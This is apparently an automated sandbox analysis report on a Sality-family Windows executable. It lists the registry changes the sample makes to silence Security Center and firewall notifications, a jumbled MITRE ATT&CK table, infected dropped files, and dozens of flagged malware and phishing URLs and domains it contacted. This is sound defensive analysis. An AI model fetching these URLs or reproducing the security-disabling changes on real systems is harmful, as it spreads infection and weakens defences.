        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Modifies the windows firewall
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotificationsJump to behavior
        Modifies the windows firewall notifications settings
        Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileRegistry value created: DisableNotifications 1Jump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Bdaejec
        Source: Yara matchFile source: Process Memory Space: YMZwp.exe PID: 7348, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Bdaejec
        Source: Yara matchFile source: Process Memory Space: YMZwp.exe PID: 7348, type: MEMORYSTR
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_02423911 htons,socket,setsockopt,bind,recvfrom,InterlockedExchange,CreateThread,Sleep,closesocket,RtlExitUserThread,6_2_02423911

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure12
        Replication Through Removable Media        		3
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		6
        Disable or Modify Tools        		1
        Credential API Hooking        		12
        System Time Discovery        		1
        Taint Shared Content        		1
        Archive Collected Data        		4
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        Inhibit System Recovery
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Windows Service        		1
        Bypass User Account Control        		1
        Deobfuscate/Decode Files or Information        		1
        Input Capture        		11
        Peripheral Device Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Access Token Manipulation        		31
        Obfuscated Files or Information        		Security Account Manager1
        Account Discovery        		SMB/Windows Admin Shares1
        Input Capture        		11
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Windows Service        		121
        Software Packing        		NTDS5
        File and Directory Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script52
        Process Injection        		1
        DLL Side-Loading        		LSA Secrets23
        System Information Discovery        		SSHKeylogging13
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Bypass User Account Control        		Cached Domain Credentials221
        Security Software Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading        		DCSync31
        Virtualization/Sandbox Evasion        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
        Virtualization/Sandbox Evasion        		Proc Filesystem3
        Process Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation        		/etc/passwd and /etc/shadow11
        Application Window Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron52
        Process Injection        		Network Sniffing1
        System Owner/User Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467984 Sample: #U6587#U4ef6#U7279#U5f81#U6... Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 40 www.careerdesk.org 2->40 42 g2.arrowhitech.com 2->42 44 7 other IPs or domains 2->44 54 Snort IDS alert for network traffic 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 12 other signatures 2->60 8 #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe 501 168 2->8         started        signatures3 process4 dnsIp5 46 ahmediye.net 78.46.2.155, 49712, 49720, 49725 HETZNER-ASDE Germany 8->46 48 www.careerdesk.org 54.244.188.177, 49707, 49715, 49722 AMAZON-02US United States 8->48 50 3 other IPs or domains 8->50 26 C:\lwkdr.exe, PE32 8->26 dropped 28 C:\Users\user\AppData\Local\...\winxmkqo.exe, PE32 8->28 dropped 30 C:\Users\user\AppData\Local\Temp\YMZwp.exe, PE32 8->30 dropped 32 2 other malicious files 8->32 dropped 62 Creates autorun.inf (USB autostart) 8->62 64 Changes security center settings (notifications, updates, antivirus, firewall) 8->64 66 Contains functionality to inject threads in other processes 8->66 68 10 other signatures 8->68 13 YMZwp.exe 14 8->13         started        18 SearchApp.exe 8->18 injected 20 dllhost.exe 7 8->20         started        22 23 other processes 8->22 file6 signatures7 process8 dnsIp9 52 arthur.niria.biz 44.221.84.105, 49706, 49710, 49711 AMAZON-AESUS United States 13->52 34 C:\Program Files\7-Zip\Uninstall.exe, PE32 13->34 dropped 36 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 13->36 dropped 38 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 13->38 dropped 70 Antivirus detection for dropped file 13->70 72 Multi AV Scanner detection for dropped file 13->72 74 Detected unpacking (changes PE section rights) 13->74 78 2 other signatures 13->78 24 WerFault.exe 13->24         started        76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->76 file10 signatures11 process12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe97%ReversingLabsWin32.Virus.Sality
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe89%VirustotalBrowse
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe100%AviraW32/Sality.AT
        #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
        C:\Users\user\AppData\Local\Temp\YMZwp.exe100%AviraTR/Dldr.Small.Z.haljq
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
        C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\YMZwp.exe100%Joe Sandbox ML
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\YMZwp.exe100%ReversingLabsWin32.Trojan.Skeeyah

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        www.careerdesk.org12%VirustotalBrowse
        ddos.dnsnb8.net12%VirustotalBrowse
        ampyazilim.com.tr0%VirustotalBrowse
        apple-pie.in14%VirustotalBrowse
        arthur.niria.biz11%VirustotalBrowse
        ahmediye.net9%VirustotalBrowse
        althawry.org12%VirustotalBrowse
        windowsupdatebg.s.llnwi.net0%VirustotalBrowse
        amsamex.com8%VirustotalBrowse
        g2.arrowhitech.com3%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
        http://schemas.micro0%URL Reputationsafe
        http://www.careerdesk.org/images/xs.jpg100%Avira URL Cloudmalware
        http://g2.arrowhitech.com/xs.jpg?31651bdd=-1131545915~0%Avira URL Cloudsafe
        http://www.careerdesk.org/images/xs.jpg?5eb9eca6=-1116481204100%Avira URL Cloudmalware
        http://ampyazilim.com.tr/images/xs2.jpg?d82b8544=16220213920%Avira URL Cloudsafe
        http://ampyazilim.com.tr/images/xs2.jpg?cd510956=433312460%Avira URL Cloudsafe
        http://ahmediye.net/xs.jpg?c750acd5=-19020283740%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?a8434aa9=-1471984983100%Avira URL Cloudmalware
        http://arthur.niria.biz/xs.jpg?96faab4=1108191980P100%Avira URL Cloudmalware
        http://arthur.niria.biz/xs.jpg?c1df27dd=251215592100%Avira URL Cloudmalware
        http://www.careerdesk.org/images/xs.jpg9%VirustotalBrowse
        http://ampyazilim.com.tr/images/xs2.jpg?5829e9af=-10517674320%Avira URL Cloudsafe
        http://ampyazilim.com.tr/images/xs2.jpg?43b77b4=710061320%Avira URL Cloudsafe
        http://ahmediye.net/xs.jpg?a4a56c66=-15326626820%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?6dcc621=690791622100%Avira URL Cloudmalware
        https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new0%Avira URL Cloudsafe
        http://althawry.org/images/xs.jpg?e60800=75376640L0%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?60b080=25346560100%Avira URL Cloudmalware
        http://amsamex.com/xs.jpg?c46dd74c=-702204804f100%Avira URL Cloudmalware
        https://outlook.comx0%Avira URL Cloudsafe
        https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new0%VirustotalBrowse
        http://arthur.niria.biz/xs.jpg?96faab4=1108191980100%Avira URL Cloudmalware
        http://apple-pie.in/images/xs.jpg?5e41367=98833255100%Avira URL Cloudphishing
        http://ampyazilim.com.tr/images/xs2.jpg?f026a792=-2659021900%Avira URL Cloudsafe
        http://g2.arrowhitech.com/xs.jpg?19106679=-8991520670%Avira URL Cloudsafe
        http://althawry.org/images/xs.jpg?3c7c82ae=15579941880%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?2bcaf743=1582807576100%Avira URL Cloudmalware
        http://arthur.niria.biz/xs.jpg?2f6b0f9=149164779100%Avira URL Cloudmalware
        http://www.careerdesk.org/images/xs.jpg?1651959c=1123336404100%Avira URL Cloudmalware
        https://android.notify.windows.com/iOSp0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc0%Avira URL Cloudsafe
        http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchasep0%Avira URL Cloudsafe
        http://apple-pie.in/images/xs.jpg?5f87de0d=2115991604p100%Avira URL Cloudphishing
        http://apple-pie.in/images/xs.jpg?c7d4d608=1993464376g100%Avira URL Cloudphishing
        https://android.notify.windows.com/iOSp0%VirustotalBrowse
        http://arthur.niria.biz/xs.jpg?67316d6f=898910285100%Avira URL Cloudmalware
        https://www.msn.com/de-ch/play/games/master-checkers-multiplayer/cg-9p3c5sx31v9k&quot;0%Avira URL Cloudsafe
        https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w0%Avira URL Cloudsafe
        http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchasep0%VirustotalBrowse
        http://ampyazilim.com.tr/images/xs2.jpg?434c9e5=2822736840%Avira URL Cloudsafe
        http://althawry.org/images/xs.jpg?ee51bd01=-5932661740%Avira URL Cloudsafe
        https://outlook.live.com/owahttps://outlook.office.com/owaCodexChatButtonUpperRight0%Avira URL Cloudsafe
        http://www.careerdesk.org/images/xs.jpg?3c84448=190368984100%Avira URL Cloudmalware
        http://www.careerdesk.org/images/xs.jpg?9ad6cfae=1905085726100%Avira URL Cloudmalware
        http://ahmediye.net/xs.jpg?a9db6871=-14859873880%Avira URL Cloudsafe
        https://loki.delv0%Avira URL Cloudsafe
        http://ampyazilim.com.tr/images/xs2.jpg?12dacc76=12653163120%Avira URL Cloudsafe
        http://ampyazilim.com.tr/images/xs2.jpg?e4bc5c05=1550460958LCuy0%Avira URL Cloudsafe
        http://ns.adora0%Avira URL Cloudsafe
        http://173.193.19.14/logo.gif100%Avira URL Cloudmalware
        https://ntp.msn.com/web-widget?form=M0%Avira URL Cloudsafe
        http://www.careerdesk.org/images/xs.jpg?5e49a2=6179234100%Avira URL Cloudmalware
        http://g2.arrowhitech.com/xs.jpg?374a39ba=-5845220080%Avira URL Cloudsafe
        http://apple-pie.in/images/xs.jpg?58f235fe=2037783532100%Avira URL Cloudphishing
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark0%Avira URL Cloudsafe
        http://ahmediye.net/xs.jpg?35cb7c96=4353469080%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?224a908=215742000100%Avira URL Cloudmalware
        http://arthur.niria.biz/xs.jpg?11c3299b=-1612941709100%Avira URL Cloudmalware
        http://arthur.niria.biz/xs.jpg?e8fd1062=1978557004100%Avira URL Cloudmalware
        http://apple-pie.in/images/xs.jpg?63977b=19580529&100%Avira URL Cloudphishing
        http://ampyazilim.com.tr/images/xs2.jpg?180330c9=16114491240%Avira URL Cloudsafe
        http://apple-pie.in/images/xs.jpg?70445cbe=-228113746100%Avira URL Cloudphishing
        http://ampyazilim.com.tr/images/xs2.jpg?908734c0=-15220040960%Avira URL Cloudsafe
        https://android.notify.windows.com/iOSZM0%Avira URL Cloudsafe
        http://www.careerdesk.org/images/xs.jpg?17b6de9=198930248100%Avira URL Cloudmalware
        http://apple-pie.in/images/xs.jpg?ea3b604f=-1460829892100%Avira URL Cloudphishing
        http://ampyazilim.com.tr/images/xs2.jpg?1055bd73=-18284766610%Avira URL Cloudsafe
        http://ahmediye.net/xs.jpg?3fc1b58c=-11023178680%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?a62d3528=-1506986712100%Avira URL Cloudmalware
        http://apple-pie.in/images/xs.jpgs.jpg100%Avira URL Cloudphishing
        http://ampyazilim.com.tr/images/xs2.jpg?669212f9=-8389578730%Avira URL Cloudsafe
        https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
        http://apple-pie.in/images/xs.jpg?3e44093b=-116382484100%Avira URL Cloudphishing
        http://www.careerdesk.org/images/xs.jpg?8021ab3c=-2145277124Qe100%Avira URL Cloudmalware
        http://www.careerdesk.org/images/xs.jpg?18be425f=-973991176100%Avira URL Cloudmalware
        http://ampyazilim.com.tr/images/xs2.jpg?37f8d56f=13393593860%Avira URL Cloudsafe
        http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstruments0%Avira URL Cloudsafe
        http://ampyazilim.com.tr/images/xs2.jpg?cbebb896=16737345940%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?1bf90ddb=938613686100%Avira URL Cloudmalware
        http://ahmediye.net/xs.jpg?513542c=2554584360%Avira URL Cloudsafe
        http://ddos.dnsnb8.net:799/cj//k1.rario100%Avira URL Cloudphishing
        https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist0%Avira URL Cloudsafe
        http://schemas.datacontract.org/2004/07/Store.Purchasep0%Avira URL Cloudsafe
        https://live.xbox.com/purchase/xbox/0%Avira URL Cloudsafe
        https://xsts.auth.xboxlive.com0%Avira URL Cloudsafe
        http://ampyazilim.com.tr/images/xs2.jpg?1964acc0=12780846720%Avira URL Cloudsafe
        http://ocsp.msocsp.0%Avira URL Cloudsafe
        http://althawry.org/images/xs.jpg?93473576=6468676920%Avira URL Cloudsafe
        http://arthur.niria.biz/xs.jpg?60b080=25346560=100%Avira URL Cloudmalware
        https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/0%Avira URL Cloudsafe
        http://ahmediye.net/xs.jpg?fbaba77=5277913420%Avira URL Cloudsafe
        https://substrate.office365.us/search/api/v2/queryhttps://substrate.office.com/search/api/v2/query0%Avira URL Cloudsafe
        http://ahmediye.net/xs.jpg?1786b5d7=15788173720%Avira URL Cloudsafe
        http://ahmediye.net/xs.jpg?baaa592=17615959380%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
        http://amsamex.com/xs.jpg?73b8b348=-20599928806100%Avira URL Cloudmalware
        http://ahmediye.net/xs.jpg?9a7e303d=-8140511450%Avira URL Cloudsafe
        http://ampyazilim.com.tr/images/xs2.jpg?a8241ece=-185537637210%Avira URL Cloudsafe
        http://kukutrustnet777888.info/DisableTaskMgrSoftware100%Avira URL Cloudphishing

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.careerdesk.org
        		54.244.188.177
        		truetrueunknown
        ddos.dnsnb8.net
        		44.221.84.105
        		truetrueunknown
        ampyazilim.com.tr
        		37.230.104.89
        		truetrueunknown
        apple-pie.in
        		44.221.84.105
        		truetrueunknown
        arthur.niria.biz
        		44.221.84.105
        		truetrueunknown
        ahmediye.net
        		78.46.2.155
        		truetrueunknown
        windowsupdatebg.s.llnwi.net
        		46.228.146.128
        		truefalseunknown
        amsamex.com
        		unknown
        		unknowntrueunknown
        althawry.org
        		unknown
        		unknowntrueunknown
        g2.arrowhitech.com
        		unknown
        		unknowntrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://ampyazilim.com.tr/images/xs2.jpg?cd510956=43331246true
        • Avira URL Cloud: safe
        		unknown
        http://www.careerdesk.org/images/xs.jpg?5eb9eca6=-1116481204true
        • Avira URL Cloud: malware
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?d82b8544=1622021392true
        • Avira URL Cloud: safe
        		unknown
        http://ahmediye.net/xs.jpg?c750acd5=-1902028374true
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?a8434aa9=-1471984983true
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?c1df27dd=251215592true
        • Avira URL Cloud: malware
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?5829e9af=-1051767432true
        • Avira URL Cloud: safe
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?43b77b4=71006132true
        • Avira URL Cloud: safe
        		unknown
        http://ahmediye.net/xs.jpg?a4a56c66=-1532662682true
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?6dcc621=690791622true
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?60b080=25346560true
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?96faab4=1108191980true
        • Avira URL Cloud: malware
        		unknown
        http://apple-pie.in/images/xs.jpg?5e41367=98833255true
        • Avira URL Cloud: phishing
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?f026a792=-265902190true
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?2bcaf743=1582807576true
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?2f6b0f9=149164779true
        • Avira URL Cloud: malware
        		unknown
        http://www.careerdesk.org/images/xs.jpg?1651959c=1123336404true
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?67316d6f=898910285true
        • Avira URL Cloud: malware
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?434c9e5=282273684true
        • Avira URL Cloud: safe
        		unknown
        http://www.careerdesk.org/images/xs.jpg?3c84448=190368984true
        • Avira URL Cloud: malware
        		unknown
        http://www.careerdesk.org/images/xs.jpg?9ad6cfae=1905085726true
        • Avira URL Cloud: malware
        		unknown
        http://ahmediye.net/xs.jpg?a9db6871=-1485987388true
        • Avira URL Cloud: safe
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?12dacc76=1265316312true
        • Avira URL Cloud: safe
        		unknown
        http://www.careerdesk.org/images/xs.jpg?5e49a2=6179234true
        • Avira URL Cloud: malware
        		unknown
        http://apple-pie.in/images/xs.jpg?58f235fe=2037783532true
        • Avira URL Cloud: phishing
        		unknown
        http://ahmediye.net/xs.jpg?35cb7c96=435346908true
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?224a908=215742000true
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?11c3299b=-1612941709true
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?e8fd1062=1978557004true
        • Avira URL Cloud: malware
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?180330c9=1611449124true
        • Avira URL Cloud: safe
        		unknown
        http://apple-pie.in/images/xs.jpg?70445cbe=-228113746true
        • Avira URL Cloud: phishing
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?908734c0=-1522004096true
        • Avira URL Cloud: safe
        		unknown
        http://www.careerdesk.org/images/xs.jpg?17b6de9=198930248true
        • Avira URL Cloud: malware
        		unknown
        http://apple-pie.in/images/xs.jpg?ea3b604f=-1460829892true
        • Avira URL Cloud: phishing
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?1055bd73=-1828476661true
        • Avira URL Cloud: safe
        		unknown
        http://ahmediye.net/xs.jpg?3fc1b58c=-1102317868true
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?a62d3528=-1506986712true
        • Avira URL Cloud: malware
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?669212f9=-838957873true
        • Avira URL Cloud: safe
        		unknown
        http://apple-pie.in/images/xs.jpg?3e44093b=-116382484true
        • Avira URL Cloud: phishing
        		unknown
        http://www.careerdesk.org/images/xs.jpg?18be425f=-973991176true
        • Avira URL Cloud: malware
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?37f8d56f=1339359386true
        • Avira URL Cloud: safe
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?cbebb896=1673734594true
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?1bf90ddb=938613686true
        • Avira URL Cloud: malware
        		unknown
        http://ahmediye.net/xs.jpg?513542c=255458436true
        • Avira URL Cloud: safe
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?1964acc0=1278084672true
        • Avira URL Cloud: safe
        		unknown
        http://ahmediye.net/xs.jpg?fbaba77=527791342true
        • Avira URL Cloud: safe
        		unknown
        http://ahmediye.net/xs.jpg?1786b5d7=1578817372true
        • Avira URL Cloud: safe
        		unknown
        http://ahmediye.net/xs.jpg?baaa592=1761595938true
        • Avira URL Cloud: safe
        		unknown
        http://ahmediye.net/xs.jpg?9a7e303d=-814051145true
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?4fe5ce70=1066875328true
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://g2.arrowhitech.com/xs.jpg?31651bdd=-1131545915~#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.careerdesk.org/images/xs.jpg#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmptrue
        • 9%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://arthur.niria.biz/xs.jpg?96faab4=1108191980P#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3823441121.0000000002F10000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newmsedge.exe.6.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://althawry.org/images/xs.jpg?e60800=75376640L#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://amsamex.com/xs.jpg?c46dd74c=-702204804f#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://outlook.comxStartMenuExperienceHost.exe, 0000001D.00000000.1504669127.00000273D826E000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://g2.arrowhitech.com/xs.jpg?19106679=-899152067#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
